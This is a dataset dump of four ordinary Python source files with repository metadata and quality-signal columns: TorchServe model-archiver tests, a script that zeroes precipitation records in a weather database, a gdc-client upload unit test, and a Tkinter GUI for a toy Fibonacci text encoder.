hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
bb0e76409aeef486ffdd393f481e6ae875e7c355 | 7,338 | py | Python | test/pytest/test_model_archiver.py | vvekic/serve | f02a56bf1f0de1705fd9f399c1115d36e343c90c | [
"Apache-2.0"
] | 2 | 2022-03-26T05:17:45.000Z | 2022-03-26T05:44:53.000Z | test/pytest/test_model_archiver.py | vvekic/serve | f02a56bf1f0de1705fd9f399c1115d36e343c90c | [
"Apache-2.0"
] | null | null | null | test/pytest/test_model_archiver.py | vvekic/serve | f02a56bf1f0de1705fd9f399c1115d36e343c90c | [
"Apache-2.0"
] | 1 | 2020-09-14T08:31:34.000Z | 2020-09-14T08:31:34.000Z | import subprocess
import time
import os
import glob
import requests
import json
import test_utils
MODEL_SFILE_NAME = 'resnet18-f37072fd.pth'
def setup_module(module):
test_utils.torchserve_cleanup()
response = requests.get('https://download.pytorch.org/models/' + MODEL_SFILE_NAME, allow_redirects=True)
open(test_utils.MODEL_STORE + "/" + MODEL_SFILE_NAME, 'wb').write(response.content)
def teardown_module(module):
test_utils.torchserve_cleanup()
def model_archiver_command_builder(model_name=None, version=None, model_file=None, serialized_file=None, handler=None, extra_files=None, force=False):
cmd = "torch-model-archiver"
if model_name:
cmd += " --model-name {0}".format(model_name)
if version:
cmd += " --version {0}".format(version)
if model_file:
cmd += " --model-file {0}".format(model_file)
if serialized_file:
cmd += " --serialized-file {0}".format(serialized_file)
if handler:
cmd += " --handler {0}".format(handler)
if extra_files:
cmd += " --extra-files {0}".format(extra_files)
if force:
cmd += " --force"
cmd += " --export-path {0}".format(test_utils.MODEL_STORE)
return cmd
def create_resnet_archive(model_name="resnset-18", version="1.0", force=False):
cmd = model_archiver_command_builder(
model_name,
version,
"{}/examples/image_classifier/resnet_18/model.py".format(test_utils.CODEBUILD_WD),
"{}resnet18-f37072fd.pth".format(test_utils.MODEL_STORE),
"image_classifier",
"{}/examples/image_classifier/index_to_name.json".format(test_utils.CODEBUILD_WD),
force
)
print(cmd)
cmd = cmd.split(" ")
return subprocess.run(cmd).returncode
def clean_mar_file(mar_name):
path = "{}{}".format(test_utils.MODEL_STORE, mar_name)
if os.path.exists(path):
os.remove(path)
def test_multiple_model_versions_registration():
# Download resnet-18 model
create_resnet_archive("resnet-18", "1.0")
create_resnet_archive("resnet-18_v2", "2.0")
test_utils.start_torchserve(no_config_snapshots=True)
response = requests.get('http://localhost:8081/models/resnet18/all')
print(response.content)
test_utils.register_model("resnet18", "resnet-18.mar")
test_utils.register_model("resnet18", "resnet-18_v2.mar")
response = requests.get('http://localhost:8081/models/resnet18/all')
time.sleep(5)
# Verify that we can use the list models api to get all versions of resnet-18
assert len(json.loads(response.content)) == 2
def test_duplicate_model_registration_using_local_url_followed_by_http_url():
# Registration through local mar url is already complete in previous test case.
# Now try to register same model using http url in this next step
response = test_utils.register_model("resnet18", "https://torchserve.pytorch.org/mar_files/resnet-18.mar")
time.sleep(15)
if json.loads(response.content)['code'] == 500 and \
json.loads(response.content)['type'] == "InternalServerException":
assert True, "Internal Server Exception, " \
"Model file already exists!! Duplicate model registration request"
test_utils.unregister_model("resnet18")
time.sleep(10)
else:
assert False, "Something is not right!! Successfully re-registered existing model "
def test_duplicate_model_registration_using_http_url_followed_by_local_url():
# Register using http url
clean_mar_file("resnet-18.mar")
response = test_utils.register_model("resnet18", "https://torchserve.pytorch.org/mar_files/resnet-18.mar")
create_resnet_archive()
response = test_utils.register_model("resnet18", "resnet-18.mar")
if json.loads(response.content)['code'] == 409 and \
json.loads(response.content)['type'] == "ConflictStatusException":
assert True, "Conflict Status Exception, " \
"Duplicate model registration request"
response = test_utils.unregister_model("resnet18")
time.sleep(10)
else:
assert False, "Something is not right!! Successfully re-registered existing model "
def test_model_archiver_to_regenerate_model_mar_without_force():
clean_mar_file("resnet-18.mar")
response = create_resnet_archive("resnet-18", "1.0")
response = create_resnet_archive("resnet-18", "1.0")
try:
assert (0 != response), "Mar file couldn't be created.use -f option"
finally:
for f in glob.glob("resnet*.mar"):
os.remove(f)
def test_model_archiver_to_regenerate_model_mar_with_force():
clean_mar_file("resnet-18.mar")
response = create_resnet_archive("resnet-18", "1.0")
response = create_resnet_archive("resnet-18", "1.0", force=True)
try:
assert (0 == response), "Successfully created Mar file by using -f option"
finally:
for f in glob.glob("resnet*.mar"):
os.remove(f)
def test_model_archiver_without_handler_flag():
cmd = model_archiver_command_builder(
"resnet-18",
"1.0",
"{}/examples/image_classifier/resnet_18/model.py".format(test_utils.CODEBUILD_WD),
"{}/resnet18-f37072fd.pth".format(test_utils.MODEL_STORE),
None,
"{}/examples/image_classifier/index_to_name.json".format(test_utils.CODEBUILD_WD)
)
cmd = cmd.split(" ")
try:
assert (0 != subprocess.run(cmd).returncode), "Mar file couldn't be created." \
"No handler specified"
finally:
for f in glob.glob("resnet*.mar"):
os.remove(f)
def test_model_archiver_without_model_name_flag():
cmd = model_archiver_command_builder(
None,
"1.0",
"{}/examples/image_classifier/resnet_18/model.py".format(test_utils.CODEBUILD_WD),
"{}/resnet18-f37072fd.pth".format(test_utils.MODEL_STORE),
"image_classifier",
"{}/examples/image_classifier/index_to_name.json".format(test_utils.CODEBUILD_WD)
)
cmd = cmd.split(" ")
assert (0 != subprocess.run(cmd).returncode), "Mar file couldn't be created." \
"No model_name specified"
def test_model_archiver_without_model_file_flag():
cmd = model_archiver_command_builder(
"resnet-18",
"1.0",
None,
"{}/resnet18-f37072fd.pth".format(test_utils.MODEL_STORE),
"image_classifier",
"{}/examples/image_classifier/index_to_name.json".format(test_utils.CODEBUILD_WD),
True
)
cmd = cmd.split(" ")
try:
assert (0 == subprocess.run(cmd).returncode)
finally:
for f in glob.glob("resnet*.mar"):
os.remove(f)
def test_model_archiver_without_serialized_flag():
cmd = model_archiver_command_builder(
"resnet-18",
"1.0",
"{}/examples/image_classifier/resnet_18/model.py".format(test_utils.CODEBUILD_WD),
None,
"image_classifier",
"{}/examples/image_classifier/index_to_name.json".format(test_utils.CODEBUILD_WD)
)
cmd = cmd.split(" ")
assert (0 != subprocess.run(cmd).returncode), "Mar file couldn't be created." \
"No serialized flag specified"
| 34.613208 | 150 | 0.661897 | 924 | 7,338 | 5.022727 | 0.175325 | 0.052359 | 0.048481 | 0.046542 | 0.632622 | 0.615385 | 0.520362 | 0.50097 | 0.471881 | 0.449041 | 0 | 0.027725 | 0.213546 | 7,338 | 211 | 151 | 34.777251 | 0.776469 | 0.03625 | 0 | 0.468354 | 0 | 0 | 0.268186 | 0.082791 | 0 | 0 | 0 | 0 | 0.06962 | 1 | 0.088608 | false | 0 | 0.044304 | 0 | 0.14557 | 0.012658 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb0fd7461ac334e4ca39e6b98dfce5e7a36f1733 | 2,176 | py | Python | scripts/isuag/zero_daily_precip.py | trentford/iem | 7264d24f2d79a3cd69251a09758e6531233a732f | [
"MIT"
] | 1 | 2019-10-07T17:01:24.000Z | 2019-10-07T17:01:24.000Z | scripts/isuag/zero_daily_precip.py | trentford/iem | 7264d24f2d79a3cd69251a09758e6531233a732f | [
"MIT"
] | null | null | null | scripts/isuag/zero_daily_precip.py | trentford/iem | 7264d24f2d79a3cd69251a09758e6531233a732f | [
"MIT"
] | null | null | null | """Sometimes we need to completely zero out precip for a day
Likely due to water being dumped into the tipping bucket to clean it :/
"""
from __future__ import print_function
import sys
import datetime
import pytz
from pyiem.util import get_dbconn
def zero_hourly(station, sts, ets):
"""Zero out the hourly data"""
pgconn = get_dbconn('isuag')
cursor = pgconn.cursor()
for table in ['sm_hourly', 'sm_15minute']:
cursor.execute("""
UPDATE """ + table + """
SET rain_mm_tot_qc = 0, rain_mm_tot_f = 'Z', rain_mm_tot = 0
WHERE station = %s and valid > %s and valid <= %s
""", (station, sts, ets))
print("%s updated %s rows" % (table, cursor.rowcount))
cursor.close()
pgconn.commit()
def zero_daily(station, date):
"""Zero out the daily data"""
pgconn = get_dbconn('isuag')
cursor = pgconn.cursor()
cursor.execute("""
UPDATE sm_daily
SET rain_mm_tot_qc = 0, rain_mm_tot_f = 'Z', rain_mm_tot = 0
WHERE station = %s and valid = %s
""", (station, date))
print("sm_daily updated %s rows" % (cursor.rowcount, ))
cursor.close()
pgconn.commit()
def zero_iem(station, date):
"""Zero out the hourly data"""
pgconn = get_dbconn('iem')
cursor = pgconn.cursor()
cursor.execute("""
UPDATE summary s
SET pday = 0
FROM stations t
WHERE s.iemid = t.iemid and t.id = %s and t.network = 'ISUSM'
and day = %s
""", (station, date))
print("summary updated %s rows" % (cursor.rowcount, ))
cursor.close()
pgconn.commit()
def main(argv):
"""Go Main"""
station = argv[1]
date = datetime.date(int(argv[2]), int(argv[3]), int(argv[4]))
# Our weather stations are in CST, so the 'daily' precip is for a 6z to 6z
# period and not calendar day, the hourly values are in the rears
sts = datetime.datetime(date.year, date.month, date.day, 6)
sts = sts.replace(tzinfo=pytz.utc)
ets = sts + datetime.timedelta(hours=24)
zero_hourly(station, sts, ets)
zero_daily(station, date)
zero_iem(station, date)
if __name__ == '__main__':
main(sys.argv)
| 29.405405 | 78 | 0.619485 | 312 | 2,176 | 4.182692 | 0.346154 | 0.027586 | 0.041379 | 0.043678 | 0.451341 | 0.390038 | 0.308812 | 0.308812 | 0.168582 | 0.168582 | 0 | 0.009792 | 0.249081 | 2,176 | 73 | 79 | 29.808219 | 0.788862 | 0.160846 | 0 | 0.346154 | 0 | 0.019231 | 0.320356 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.096154 | 0 | 0.173077 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb11c19b934ae7836905268d9b3aaa294ea05171 | 602 | py | Python | tests/test_upload_client.py | hepoo6/gdc-client | 4453c6412aca55bcc458d710de148a4cabf95cd6 | [
"Apache-2.0"
] | null | null | null | tests/test_upload_client.py | hepoo6/gdc-client | 4453c6412aca55bcc458d710de148a4cabf95cd6 | [
"Apache-2.0"
] | null | null | null | tests/test_upload_client.py | hepoo6/gdc-client | 4453c6412aca55bcc458d710de148a4cabf95cd6 | [
"Apache-2.0"
] | null | null | null | from unittest import TestCase
from gdc_client.upload.client import create_resume_path
class UploadClientTest(TestCase):
def setup(self):
pass
def test_create_resume_path(self):
# don't need to test if there's no file given
# that is checked in multipart_upload()
tests = ["/path/to/file.yml", "path/to/file.yml", "file.yml"]
results = [
"/path/to/resume_file.yml",
"path/to/resume_file.yml",
"resume_file.yml",
]
for i, t in enumerate(tests):
assert create_resume_path(t) == results[i]
| 28.666667 | 69 | 0.611296 | 81 | 602 | 4.395062 | 0.481481 | 0.117978 | 0.134831 | 0.073034 | 0.106742 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.27907 | 602 | 20 | 70 | 30.1 | 0.820277 | 0.134552 | 0 | 0 | 0 | 0 | 0.198842 | 0.090734 | 0 | 0 | 0 | 0 | 0.071429 | 1 | 0.142857 | false | 0.071429 | 0.142857 | 0 | 0.357143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
bb123dfd4bea8d7fa36ad8f1991ad5d0085d8387 | 15,843 | py | Python | Fibonnacci GUI VERSION.py | Nuklear-s-Team/fibonacciThing | 2b32f10a87faf87b6702e7caa20c69d8df6873e3 | [
"CC0-1.0"
] | null | null | null | Fibonnacci GUI VERSION.py | Nuklear-s-Team/fibonacciThing | 2b32f10a87faf87b6702e7caa20c69d8df6873e3 | [
"CC0-1.0"
] | null | null | null | Fibonnacci GUI VERSION.py | Nuklear-s-Team/fibonacciThing | 2b32f10a87faf87b6702e7caa20c69d8df6873e3 | [
"CC0-1.0"
] | 1 | 2020-04-08T18:32:54.000Z | 2020-04-08T18:32:54.000Z | # Copyright 2020 Khang Nguyen and Tim Merrill
# Improved by Luzgog
# Made with the same translate function as the original.
import tkinter as tkinter
from tkinter import messagebox
from tkinter import scrolledtext
from Fibonacci_Encoder import encode, decode, encodeReversed, decodeReversed, randomGen, encodeRandom, generatefromkey, decodeRandom
root = tkinter.Tk(className="Fibonacci Encoder")
root.resizable(0, 0)
help = tkinter.Toplevel(width=90, height=90)
help.withdraw()
translations = tkinter.Toplevel(width=90, height=90)
translations.withdraw()
lol = tkinter.StringVar()
mode = tkinter.StringVar()
lastTranslation = tkinter.StringVar()
remTrue = tkinter.IntVar()
key = tkinter.StringVar()
lastTranslation.set("Last Tranlsation: None")
currentTranslation = ""
#root.iconphoto(False, tkinter.PhotoImage(file="icon.png"))
decodeNames = ["de", "decode", "De", "Decode", "d", "D"]
encodeNames = ["en", "encode", "En", "Encode", "e", "E"]
def showHelp():
help.deiconify()
def closeHelp():
help.withdraw()
def error():
messagebox.showerror("Error", "Invalid Input")
def keyMissingError():
messagebox.showerror("Error", "No Key")
def translate():
global currentTranslation
task = lol.get()
message = T.get()
version = mode.get()
getKey = RandomEncode.get()
global key
T.delete(0, tkinter.END)
if task in encodeNames:
if version == "Regular":
try:
totranslate= encode(message)
except BaseException:
error()
elif version == "Reversed":
try:
totranslate = encodeReversed(message)
except BaseException:
error()
elif version == "Random":
try:
if getKey == "":
randomDict, key2 = randomGen()
key.set(key2)
key2 = ''
totranslate = encodeRandom(message, randomDict)
getKey = ""
randomDict = {}
else:
totranslate = encodeRandom(message, generatefromkey(getKey))
getKey = ""
except BaseException:
error()
elif task in decodeNames:
if version == "Regular":
try:
totranslate = decode(message)
except BaseException:
error()
elif version == "Reversed":
try:
totranslate = decodeReversed(message)
except BaseException:
error()
elif version == "Random":
if getKey == "":
keyMissingError()
else:
totranslate = decodeRandom(message, generatefromkey(getKey))
T.insert(tkinter.END, totranslate)
link.config(state=tkinter.NORMAL)
keyDisplay.config(state=tkinter.NORMAL)
link.delete(1.0, tkinter.END)
keyDisplay.delete(1.0, tkinter.END)
mode2 = mode.get()
link.insert(1.0, "Last Translation: (" + mode2 + " Mode) " + message + " <-> " + totranslate)
currentTranslation = "(" + mode2 + " Mode) " + message + " <-> " + totranslate
keyDisplay.insert(1.0, str(key.get()))
key.set("")
link.config(state=tkinter.DISABLED)
keyDisplay.config(state=tkinter.DISABLED)
def updateSaves():
saves.config(state=tkinter.NORMAL)
saves.delete(1.0, tkinter.END)
with open("savedTranslations.txt", "r") as file:
textIn = file.read()
saves.insert(1.0, textIn)
saves.config(state=tkinter.DISABLED)
# insert text
def saveTranslation():
global currentTranslation
with open("savedTranslations.txt", 'a') as file:
file.write("\n\n")
file.write(currentTranslation)
updateSaves()
# save file
def clearSaves():
with open("savedTranslations.txt", "w") as file:
file.write("")
updateSaves()
def openTrans():
translations.deiconify()
def closeTrans():
translations.withdraw()
def copyKey():
root.clipboard_clear()
root.clipboard_append(keyDisplay.get(1.0, tkinter.END))
def remember():
if remTrue.get() == 0:
with open("savedKey.txt", "w") as file:
file.write("")
else:
with open("savedKey.txt", "w") as file:
file.write(RandomEncode.get())
def initialize():
saveTranslation()
with open("savedKey.txt", "r") as file:
key3 = file.read()
if key3 == "":
pass
else:
RandomEncode.insert(1, key3)
Encode = tkinter.Radiobutton(root, text='Encode', variable=lol, value="Encode", indicatoron=0, width=42, selectcolor="light green").grid(row=1, column=0, sticky=tkinter.W)
Decode = tkinter.Radiobutton(root, text='Decode', variable=lol, value="Decode", indicatoron=0, width=42, selectcolor="light green").grid(row=1, column=1, sticky=tkinter.E)
Regular = tkinter.Radiobutton(root, text='Regular', variable=mode, value="Regular", indicatoron=0, width=42, selectcolor="cyan").grid(row=4, column=0, sticky=tkinter.W)
Reversed = tkinter.Radiobutton(root, text='Reversed', variable=mode, value="Reversed", indicatoron=0, width=42, selectcolor="cyan").grid(row=4, column=1, sticky=tkinter.E)
Random = tkinter.Radiobutton(root, text="Use Random Dictionary", variable=mode, value="Random", indicatoron=0, width=42, selectcolor="gold").grid(row=5, column=0, sticky=tkinter.N)
RandomEncode = tkinter.Entry(root, width=48)
RandomEncode.grid(row=5, column=1)
J = tkinter.Scale(root, state=tkinter.DISABLED, length=600, troughcolor="black", width=1, orient=tkinter.HORIZONTAL, showvalue=0, sliderlength=200, label="--------------------------------------------------------Mode--------------------------------------------------------")
J.set(100)
J.grid(row=0, sticky=tkinter.N, columnspan=2)
R = tkinter.Scale(root, state=tkinter.DISABLED, length=500, troughcolor="black", width=1, orient=tkinter.HORIZONTAL, showvalue=0, sliderlength=200, label="--------------------------------------------Key Sets--------------------------------------------")
R.set(100)
R.grid(row=3, sticky=tkinter.N, columnspan=2)
T = tkinter.Entry(root, width=100)
L = tkinter.Scale(root, state=tkinter.DISABLED, length=500, troughcolor="black", width=1, orient=tkinter.HORIZONTAL, showvalue=0, sliderlength=200, label="------------------------------------------Input Below------------------------------------------")
L.set(100)
L.grid(row=6, sticky=tkinter.N, columnspan=2)
T.grid(row=7, column=0, sticky=tkinter.W, columnspan=2)
X = tkinter.Scale(root, state=tkinter.DISABLED, length=500, troughcolor="black", width=1, orient=tkinter.HORIZONTAL, showvalue=0, sliderlength=200)
X.set(100)
X.grid(row=8, sticky=tkinter.N, columnspan=2)
Translate = tkinter.Button(root, text="Translate", command=translate, width=42, activebackground="light green").grid(row=9, column=0, sticky=tkinter.W)
Quit = tkinter.Button(root, text="Quit", command=root.quit, width=85, activebackground="red").grid(row=10, columnspan=2, sticky=tkinter.E)
T.insert(tkinter.END, "")
Help = tkinter.Button(root, text="Help", command=showHelp, width=42, activebackground="blue").grid(row=9, column=1)
X = tkinter.Scale(root, state=tkinter.DISABLED, length=600, troughcolor="black", width=1, orient=tkinter.HORIZONTAL, showvalue=0, sliderlength=200)
X.set(100)
X.grid(row=11, sticky=tkinter.N, columnspan=2)
link = scrolledtext.ScrolledText(root, width=65, height=5, wrap="word", font="consolas", state=tkinter.DISABLED)
link.grid(row=12, sticky=tkinter.W, columnspan=2)
uti = tkinter.Scale(root, state=tkinter.DISABLED, length=600, troughcolor="black", width=1, orient=tkinter.HORIZONTAL, showvalue=0, sliderlength=200, label="-------------------------------------------------------Utilities-------------------------------------------------------")
uti.set(100)
uti.grid(row=13, sticky=tkinter.N, columnspan=2)
save = tkinter.Button(root, text="Save this translation", command=saveTranslation, width=42, activebackground="light green").grid(row=14, column=0, sticky=tkinter.N)
copy = tkinter.Button(root, text="Copy this key", command=copyKey, width=42, activebackground="light green").grid(row=14, column=1, sticky=tkinter.N)
openTranslations = tkinter.Button(root, text="Open Saved Translations", command=openTrans, width=42, activebackgroun="light green").grid(row=15, column=0, sticky=tkinter.N)
rememberKey = tkinter.Checkbutton(root, text="Remember my key", var=remTrue, command=remember).grid(row=15, column=1, sticky=tkinter.N)
keyDisplay = scrolledtext.ScrolledText(root, height=0.5, width=73, wrap="word", state=tkinter.DISABLED)
keyDisplay.grid(row=16, sticky=tkinter.W, columnspan=2)
info = tkinter.Label(root, text="Created by Khang Nguyen and Luzgog. Github link: https://github.com/PG-Development/Fibonacci-Encoder")
info.grid(row=17, sticky=tkinter.E, columnspan=2)
# help window below
title = tkinter.Label(help, text="Help Menu").grid(row=0, sticky=tkinter.N)
helpText = scrolledtext.ScrolledText(help, width=65, height=20, wrap="word")
helpText.grid(row=1, sticky=tkinter.N)
helpText.insert(1.0, "Thanks for downloading this encoder! My team and I have worked hard on it. \n \n"
"Important: When you want to close this, do NOT press the x at the top right. Press the exit help menu button at the bottom.\n \n"
"When you download this repository, you should have gotten 2 .py files: the Fibonacci_Encoder, and the Fibonacci GUI Version file. "
"Make sure they are in the same folder. The GUI Version is the much more convenient version of this program, but it uses the same functions. "
"When you open up the GUI file, you should see a small window pop up on your screen. This is the main application window, built with tkinter. "
"You select your mode at the top, choosing from either Encode, Decode, or Decode from Random. To encode from a random, select Encode from random in the keysets. "
"Below those, you should see keysets. You have regular, reversed, and encode from random. Next to both of the random choices you see inputs. "
"Below the modes and keysets you see an input, to place your text inside, and this is where the message will come out. \n \n"
"Regular Mode\n"
"Regular mode is the base mode of this encoder. It uses a set dictionary of keys and items, to encode your message. "
"To use this mode, simply choose the \"Encode\" mode and the \"Regular\" Keyset. Once you press translate, your message will be replaced "
"by the encoded version. Below your output, there is a last translation box which shows you the original. "
"To decode, just switch your mode to decode, and input the code you received from your friend into the box. "
"It should change before your very eyes into comprehensible text.\n\n"
"Reversed Mode\n"
"Reversed mode is a separate, different keyset then the regular mode. It takes the code for a letter, and switches it around to the opposite letter. "
"For example, the code for a is now the code for z, and the code for b is now the code for y. This means the code for z is now the code for a, and so on. "
"To use this keyset, choose which mode you want, and then instead of selecting the \"Regular\" keyset, choose the \"Reversed\" keyset.\n\n"
"Random Mode\n"
"Random Mode scrambles the codes for the letters to random locations. The total number of possible dictionaries is 403,291,461,126,605,635,584,000,000, aka 403 septillion. "
"That's a lot of possible combinations! And every time you use it, it generates a random choice. Now, that's cool, but say you want to retrieve an already generated "
"dictionary. That's easy! You see, whenever you generate a new dictionary, a key will appear in the lower text box. Just press the \"Copy this key\" buttton "
"to copy the key.\n\n"
"To encode using this mode, you first select the \"Encode\" Button. Then select the \"Use Random Dictionary\" choice. If you already have a key, put it in the "
"entry box next to the button. If you do not have a key, simply leave the box blank. Then press translate. You should get a result and a key. If you want to now encode "
"more messages using the same key, just copy the key and put it in the box. When you send messages to someone else, send them the key privately, so then you can"
" send them the message in public and other people will get gibberish.\n\n"
"To decode using this mode, you must have a key, or else you will get an error. Put the key in the box next to \"Use Random Dictionary\". Then select \"Decode\" "
"and \"Use Random Dictionary\". Finally, put in the message in the lower entry box. When you press Translate, you should get a good message.\n\n"
"Utilities\n"
"There are 3 utilities buttons: the \"Save this translation\" button, the \"Copy this key\" button, and the \"Open Saved Translations\" button. "
"These are here to help you use the app more efficiently.\n\n"
"The \"Save This Translations\" button takes the translation you just did and puts it into another text window that you can open. This text resets everytime you "
"close the app, so keep the app open go save your translations. This feature will be improved in the future to save the translation to a text file. To open this text "
"window, just press the \"Open Saved Translations\" button. The \"Copy This Key\" button just copies the key if you have one.\n\n"
"A new feature is the \"Remember my key\" feature, which can save your key for another time. Whenever you want to save your key, just check it. To update your "
"key, you must uncheck it and then recheck it to make changes to the .txt file. If you want to use this feature, you must download the savedKey.txt file. To "
"reset your key, you can just uncheck it again.")
helpText.tag_add("important", "3.0", "3.9")
helpText.tag_add("regularTag", "7.0", "7.12", "10.0", "10.13", "13.0", "13.12", "20.0", "20.9")
helpText.tag_config("important", foreground="red", font=("Consolas", 13, "bold", "italic"))
helpText.tag_config("regularTag", foreground="blue", font=("Consolas", 12, "bold", "italic"))
helpText.config(state=tkinter.DISABLED)
closeHelpButton = tkinter.Button(help, text="Exit Help Menu", command=closeHelp, activebackground="red").grid(row=2, sticky=tkinter.N)
# saved translations below
# saved translations below
titleTrans = tkinter.Label(translations, text="Saved Translations").grid(row=0, sticky=tkinter.N)
saves = scrolledtext.ScrolledText(translations, width=65, height=20, wrap="word")
saves.grid(row=1, sticky=tkinter.N)
saves.config(state=tkinter.DISABLED)
closeTransButton = tkinter.Button(translations, text="Exit Saved Translations", command=closeTrans, activebackground="red", width=38).grid(row=2, sticky=tkinter.W)
clearSavesButton = tkinter.Button(translations, text="Clear Saves", command=clearSaves, activebackground="red", width=38).grid(row=2, sticky=tkinter.E)
initialize()
tkinter.mainloop() | 57.194946 | 279 | 0.640977 | 2,059 | 15,843 | 4.92812 | 0.211753 | 0.020696 | 0.022075 | 0.013797 | 0.249433 | 0.183601 | 0.14487 | 0.131467 | 0.13127 | 0.093032 | 0 | 0.023367 | 0.222054 | 15,843 | 277 | 280 | 57.194946 | 0.799919 | 0.016727 | 0 | 0.201794 | 0 | 0.107623 | 0.359119 | 0.034199 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058296 | false | 0.004484 | 0.03139 | 0 | 0.089686 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
